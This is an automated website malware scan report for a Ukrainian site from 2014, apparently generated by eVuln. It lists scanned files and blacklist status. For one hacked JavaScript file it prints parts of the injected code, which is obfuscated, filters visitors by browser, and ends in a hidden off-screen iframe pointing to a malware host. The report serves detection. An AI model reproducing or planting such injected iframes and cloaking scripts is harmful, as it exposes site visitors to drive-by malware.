New scan:

Malware Scanner report for vovka-morkovka.com.ua

Malicious/Suspicious/Total urls checked
0/1/9
1 page has suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "vovka-morkovka.com.ua" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vovka-morkovka.com.ua

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://vovka-morkovka.com.ua/
200 OK
Content-Length: 26823
Content-Type: text/html
clean
http://vovka-morkovka.com.ua/templates/agroholding/scripts/bookmark.js
404 Not Found
Content-Length: 239
Content-Type: text/html
clean
http://vovka-morkovka.com.ua/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://vovka-morkovka.com.ua/modules/mod_swmenupro/ie5.js
200 OK
Content-Length: 5250
Content-Type: application/x-javascript
clean
http://vovka-morkovka.com.ua/modules/mod_swmenupro/DropDownMenuX_Packed.js
200 OK
Content-Length: 8407
Content-Type: application/x-javascript
clean
http://vovka-morkovka.com.ua/modules/jsn_imageshow_pro/swfobject.js
200 OK
Content-Length: 9370
Content-Type: application/x-javascript
clean
http://vovka-morkovka.com.ua/modules/jsn_imageshow_pro/swfobject_addon.js
200 OK
Content-Length: 3329
Content-Type: application/x-javascript
clean
http://vovka-morkovka.com.ua/includes/js/overlib_mini.js
200 OK
Content-Length: 39643
Content-Type: application/x-javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (g_haystack, g_needle, g_offset) {
var haystack = (g_haystack + '').toLowerCase();
var needle = (g_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, g_offset)) !== -1) {
return index;
}
return false;
}
function user_agenta(){
var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBr
...[3772 bytes skipped]...

Decoded script:

...[3464 bytes skipped]...
nue;
}
while ((l = fN[i].search(/\)[;\s]+/)) != -1) {
fn = fN[i].substring(0, l + 1);
fN[i] = fN[i].substring(l + 2);
if (olre.test(fn)) {
eval(fn);
}
}
}
}
}
}
}
<iframe src="http://teneta.winehost.us/herhstuytothegawhe12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe>

http://vovka-morkovka.com.ua/includes/js/overlib_hideform_mini.js
200 OK
Content-Length: 5852
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vovka-morkovka.com.ua

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 13 Oct 2014 17:58:34 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=CP1251
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Oct 2014 17:57:20 GMT
Set-Cookie: 4caeddaf7f6eff6c616fc5715c1547be=-; path=/
Set-Cookie: lang=deleted; expires=Sun, 13-Oct-2013 17:57:19 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Sun, 13-Oct-2013 17:57:19 GMT; path=/
Set-Cookie: jfcookie[lang]=russian; expires=Tue, 14-Oct-2014 17:57:20 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: vovka-morkovka.com.ua
Referer: http://www.google.com/search?q=vovka-morkovka.com.ua

Result:
The result is similar to the first query. There are no suspicious redirects found.